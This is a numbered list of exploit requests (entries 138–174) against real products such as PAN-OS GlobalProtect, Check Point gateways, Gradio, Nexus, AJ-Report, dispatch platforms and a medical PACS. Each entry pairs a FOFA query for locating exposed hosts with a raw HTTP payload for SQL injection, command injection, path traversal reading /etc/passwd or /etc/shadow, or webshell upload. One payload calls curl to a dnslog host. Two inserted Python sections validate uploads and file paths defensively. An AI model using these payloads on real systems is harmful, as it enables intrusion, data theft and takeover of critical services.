User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded file is then reachable at http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The escaped quote is an error probe; entry 187 below carries the time-based form of the same injection.

159. 英飞达 (INFINITT) medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

PAYLOAD stands in for the omitted file content. The uploaded handler is then invoked at:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully automated parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> element sets the file name (the ../ prefix places the file under the web root) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the uploaded file at http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The remotePath field chooses the target directory; the file is then reachable at http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The upload is stored under a fixed name: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

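Entries 155, 157, 159, 161, 162, 163 and 164 above (and 176, 178 and 192 later in the list) are one bug class: the server takes the file name, and with it the extension, from the request and writes the body somewhere the web server will execute it. The validator below is an added example written for this page, not code from any of the products listed; it shows the checks those handlers are missing, run over constructed file names and leading bytes modelled on the requests above. The allowlist and magic-byte table are assumptions for an image/document upload; the same validation applies whether the name arrives as a multipart filename, a form field (entry 163's name=1.php) or a query parameter (entry 192's name=.ashx).

```python
import os
import posixpath
import secrets
from urllib.parse import unquote

# Allowlist for a logo/avatar style upload endpoint (assumption for this example).
ALLOWED_EXT = {".png", ".jpg", ".gif", ".pdf"}
EXT_ALIASES = {".jpeg": ".jpg"}
# Leading bytes that must agree with the extension; the client's Content-Type header
# (image/png on a PHP body in entry 155) is never consulted.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"\xff\xd8\xff", ".jpg"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
    (b"%PDF-", ".pdf"),
]


def validate_upload(filename: str, head: bytes):
    """Check one upload. Returns (ok, reason, extension_to_store)."""
    name = unquote(filename).replace("\\", "/")
    if name != posixpath.basename(name):
        return False, "directory components in filename", None   # ../../../../dizxdell.aspx (161)
    stem, ext = os.path.splitext(name)
    ext = EXT_ALIASES.get(ext.lower(), ext.lower())
    if not stem or stem.startswith("."):
        return False, "no base name", None                        # name=.ashx (192)
    if "." in stem:
        return False, "double extension", None                    # shell.php.png
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext or '(none)'} not allowed", None  # test.php, x.jsp, x.aspx
    sniffed = next((e for magic, e in MAGIC if head.startswith(magic)), None)
    if sniffed != ext:
        return False, "content does not match extension", None    # PHP source named logo.png
    return True, "ok", ext


def stored_name(ext: str) -> str:
    """Server-chosen name: nothing from the client reaches the final path.
    The directory it lands in should sit outside the document root."""
    return secrets.token_hex(16) + ext


# Constructed samples: names and leading bytes modelled on the requests in this list.
SAMPLES = [
    ("test.php", b"<?php phpinfo();unlink(__FILE__);?>"),
    ("kjldycpvjrm.jsp", b"nyhelxrutzwhrsvsrafb"),
    ("../../../../dizxdell.aspx", b"<% %>"),
    (".ashx", b"<% @ webhandler %>"),
    ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
    ("logo.png", b"<?php system('id'); ?>"),
    ("logo.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    ("photo.JPEG", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
]


def run_samples():
    """Return (filename, ok, reason, ext) for every constructed sample."""
    return [(fn, *validate_upload(fn, head)) for fn, head in SAMPLES]


if __name__ == "__main__":
    for fn, ok, reason, ext in run_samples():
        print(f"{fn:28} {'accept' if ok else 'reject'}  {reason}")
```

Only the last two samples pass, and even they are stored under a random name, so the follow-up requests shown in these entries (a predictable .php/.jsp/.aspx path under the upload directory) have nothing to hit.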
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL (path abbreviated in the source): https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

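Entries 160, 167, 168, 170, 172 and 173 above (and 179, 188 and 190 further down) share one defect: a path taken from the request is joined to a base directory and served without checking where the joined path ends up. The Python below is an added example written for this page, not code from any of the affected products; it puts that naive join beside a checked resolver and runs both over the traversal strings taken from the requests in this list. The base directory /var/www/app/files and the two benign names are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Directory the download endpoint is meant to serve from (assumption for this example).
DOWNLOAD_ROOT = "/var/www/app/files"


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo URL encoding until it stops changing, so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def vulnerable_resolve(base: str, user_path: str) -> str:
    """The pattern behind the file-read entries: join and trust the client."""
    return base + "/" + user_path


def safe_resolve(base: str, user_path: str):
    """Return the path to serve, or None when the request would leave base."""
    decoded = fully_decode(user_path).replace("\\", "/")
    if "\x00" in decoded or "://" in decoded or decoded.startswith("/"):
        return None          # NUL truncation, file:///etc/passwd (entry 190), absolute paths
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    # A real handler resolves symlinks (os.path.realpath) before this comparison;
    # posixpath keeps the example independent of the local filesystem.
    if candidate != base and not candidate.startswith(base.rstrip("/") + "/"):
        return None
    return candidate


# Traversal strings as they appear in the requests above, plus two benign names (constructed).
PROBES = [
    "report.pdf",
    "UploadFile/../Web.Config",                                                # entry 167
    "../../../../etc/passwd",                                                  # entry 172
    "%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",     # entry 160
    "aCSHELL/../../../../../../../etc/shadow",                                 # entry 173
    "%2e%2e/flex/12234.txt",                                                   # entry 178
    "file:///etc/passwd",                                                      # entry 190
    "%252e%252e/Web.Config",                                                   # double encoding
]


def classify(base: str = DOWNLOAD_ROOT):
    """Map each probe to what the naive and the checked resolver would serve."""
    return {p: (vulnerable_resolve(base, p), safe_resolve(base, p)) for p in PROBES}


if __name__ == "__main__":
    for probe, (naive, checked) in classify().items():
        print(f"{probe:70} naive={naive}\n{'':70} checked={checked}")
```

Note what the checked resolver still allows: UploadFile/../Web.Config resolves to a file inside the base directory, so it is served. Entry 167 leaks Web.Config because the endpoint's base is the application root rather than the upload directory; the check has to be paired with a base that is exactly the directory meant to be exposed.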
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
